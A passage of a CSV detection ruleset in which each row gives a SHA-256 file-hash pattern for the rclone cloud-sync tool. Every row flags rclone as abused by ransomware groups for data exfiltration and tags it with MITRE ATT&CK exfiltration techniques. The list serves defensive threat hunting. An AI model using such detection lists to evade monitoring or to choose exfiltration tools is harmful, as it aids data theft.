"*7266febec1f01a25d6575de51c44ddf749071a4950a6384e4164954dff7ac37e*",".{0,1000}7266febec1f01a25d6575de51c44ddf749071a4950a6384e4164954dff7ac37e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*727adce0f900a6991f36b3efdde89d49e1435ff9c2a9bd5623bdc929c65b623b*",".{0,1000}727adce0f900a6991f36b3efdde89d49e1435ff9c2a9bd5623bdc929c65b623b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*72807b455e5a1fa442bb1d06bab1efac76e5b7e23256d0c1ab869a02cef890d2*",".{0,1000}72807b455e5a1fa442bb1d06bab1efac76e5b7e23256d0c1ab869a02cef890d2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*72cae1ce4bdd18227d0917fb2002615d0c78a6485a2daf850e2494ccab6aa4df*",".{0,1000}72cae1ce4bdd18227d0917fb2002615d0c78a6485a2daf850e2494ccab6aa4df.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*72dd6e4cdd75c245adf8c59c9dc4eeae3cd474ec459b238c714282e66a04ae70*",".{0,1000}72dd6e4cdd75c245adf8c59c9dc4eeae3cd474ec459b238c714282e66a04ae70.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7395137f9c26a99367fec72c608e85b7fcc078aad85fa19f48a9debe6a2ffae9*",".{0,1000}7395137f9c26a99367fec72c608e85b7fcc078aad85fa19f48a9debe6a2ffae9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*73af3c4a756699cf07ae67395f549b754ef562cfc02b764a0455cd211ec42142*",".{0,1000}73af3c4a756699cf07ae67395f549b754ef562cfc02b764a0455cd211ec42142.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*73f20bfc29a0308600ab347f8a9b6ad0c72ea18173d44e763514bedc1f6e3023*",".{0,1000}73f20bfc29a0308600ab347f8a9b6ad0c72ea18173d44e763514bedc1f6e3023.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*740bd508d67ae19842b9f48b4433cf6f41f3e42f8f12f177ca0767f7985dfa1d*",".{0,1000}740bd508d67ae19842b9f48b4433cf6f41f3e42f8f12f177ca0767f7985dfa1d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*743592ce1fa6a16f1abf80c3226237e59e4661491124a5f97824a0dfc5ae0ba2*",".{0,1000}743592ce1fa6a16f1abf80c3226237e59e4661491124a5f97824a0dfc5ae0ba2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*74395de1ba089f44dd7379d38254e3c4aa022341143482f0ddaf19011de25d10*",".{0,1000}74395de1ba089f44dd7379d38254e3c4aa022341143482f0ddaf19011de25d10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7445aec09c2d4cd750b8ae74e8fdabbb43a93005570682be5ab889aa0937771d*",".{0,1000}7445aec09c2d4cd750b8ae74e8fdabbb43a93005570682be5ab889aa0937771d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*748696842cc0d2277c0ffed2dec5a42aa3822558465770a638e730e9a1956c7e*",".{0,1000}748696842cc0d2277c0ffed2dec5a42aa3822558465770a638e730e9a1956c7e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*74a47f3037ee817f08ebec905b4dfe43c9fb88c15f82535296e00252d52e8103*",".{0,1000}74a47f3037ee817f08ebec905b4dfe43c9fb88c15f82535296e00252d52e8103.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*74cefaab7643651255c870159cec7f7231f66cfe509e9598fb3f1078549d6c49*",".{0,1000}74cefaab7643651255c870159cec7f7231f66cfe509e9598fb3f1078549d6c49.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*74e054fd266e44bb50951cfc626f3bc0ad9f820ab8bd444bcd81308aed7c1521*",".{0,1000}74e054fd266e44bb50951cfc626f3bc0ad9f820ab8bd444bcd81308aed7c1521.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*751670c4b55addd996a3e58b5be6203aa481b4f090514f32d4eb11906830f098*",".{0,1000}751670c4b55addd996a3e58b5be6203aa481b4f090514f32d4eb11906830f098.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7537476764f218919dd4eef5affee61286e88eaab8b0c3fd5a95b3285e9e90c0*",".{0,1000}7537476764f218919dd4eef5affee61286e88eaab8b0c3fd5a95b3285e9e90c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75a0df17aa8f770e15a71aae53fa30d3b2d822756c915228c499e33c8006a960*",".{0,1000}75a0df17aa8f770e15a71aae53fa30d3b2d822756c915228c499e33c8006a960.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75a4733b689d72c6fe7133c5547952f2264ff63af1fdf8794c8a63fb98d9eed1*",".{0,1000}75a4733b689d72c6fe7133c5547952f2264ff63af1fdf8794c8a63fb98d9eed1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75aa0f10da5eebe668564c35d467330b2432bceadfc74a7177def720b66fce6e*",".{0,1000}75aa0f10da5eebe668564c35d467330b2432bceadfc74a7177def720b66fce6e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75accdaedad3b82edc185dc8824a19a59c30dc6392de7074b6cd98d1dc2c9040*",".{0,1000}75accdaedad3b82edc185dc8824a19a59c30dc6392de7074b6cd98d1dc2c9040.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75d3a8726d4989bd93120a0d2072ad533bfa44bd57aa156d524844cb04d6408e*",".{0,1000}75d3a8726d4989bd93120a0d2072ad533bfa44bd57aa156d524844cb04d6408e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*75ea00374c071424bf1fda860ad857049f82c82298e5a10d8a79412d4124a87c*",".{0,1000}75ea00374c071424bf1fda860ad857049f82c82298e5a10d8a79412d4124a87c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7615aa42e43a01180dc29308b8ab3ba64d36c91e4d7fa661e3621e374de38e6a*",".{0,1000}7615aa42e43a01180dc29308b8ab3ba64d36c91e4d7fa661e3621e374de38e6a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*766aefca85a31be65bb759d69203c9ade3288316fba346a11119e80763edf705*",".{0,1000}766aefca85a31be65bb759d69203c9ade3288316fba346a11119e80763edf705.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7685c6ba0fa78d518c50316bb33123f40b4b814bf4b1fb2ff0a3f43d9f2cbd31*",".{0,1000}7685c6ba0fa78d518c50316bb33123f40b4b814bf4b1fb2ff0a3f43d9f2cbd31.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*76a3e6ff182dcab32b35fe89a3ed0c42b48aaee9dbbb78f13765c3f5d207b8b6*",".{0,1000}76a3e6ff182dcab32b35fe89a3ed0c42b48aaee9dbbb78f13765c3f5d207b8b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7704cd231ce7852898420cffe834f8efd031876df46420b6ded0d060c878e4ad*",".{0,1000}7704cd231ce7852898420cffe834f8efd031876df46420b6ded0d060c878e4ad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*773eee8cca2ea03e21802e85783f50e5a5489ba4f56e4b27ca1c667473216f74*",".{0,1000}773eee8cca2ea03e21802e85783f50e5a5489ba4f56e4b27ca1c667473216f74.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*77bf63fc831cc573dafa8ff6e2a6481af07df0107ff058eb7fc012b7c5c945e2*",".{0,1000}77bf63fc831cc573dafa8ff6e2a6481af07df0107ff058eb7fc012b7c5c945e2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*77e4c1e41124ad2e11ea1c7d5f960bbcc54d87c83396b4680700227c6ab18566*",".{0,1000}77e4c1e41124ad2e11ea1c7d5f960bbcc54d87c83396b4680700227c6ab18566.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*780ac5c4465f722d74b03675558a153fcb5540a49a505b0e1a7ecf1ee136c1cb*",".{0,1000}780ac5c4465f722d74b03675558a153fcb5540a49a505b0e1a7ecf1ee136c1cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7957e636a8a5a50b4c91c2927483a1c6034a74c722c3a79ea4c8387f01e9810c*",".{0,1000}7957e636a8a5a50b4c91c2927483a1c6034a74c722c3a79ea4c8387f01e9810c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*79ae4620212f13c7881985eb57c819c01e8faa66b14ec44827a641848d93b76b*",".{0,1000}79ae4620212f13c7881985eb57c819c01e8faa66b14ec44827a641848d93b76b.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*79b8a3146278cd69bda4a8e0cf8f9c95e27d38693403ca41b84df8487a4ef837*",".{0,1000}79b8a3146278cd69bda4a8e0cf8f9c95e27d38693403ca41b84df8487a4ef837.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*7a029f256fc6849538e6b849389d12c23490e0dd3b465043e65d4bb1767c0b77*",".{0,1000}7a029f256fc6849538e6b849389d12c23490e0dd3b465043e65d4bb1767c0b77.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for 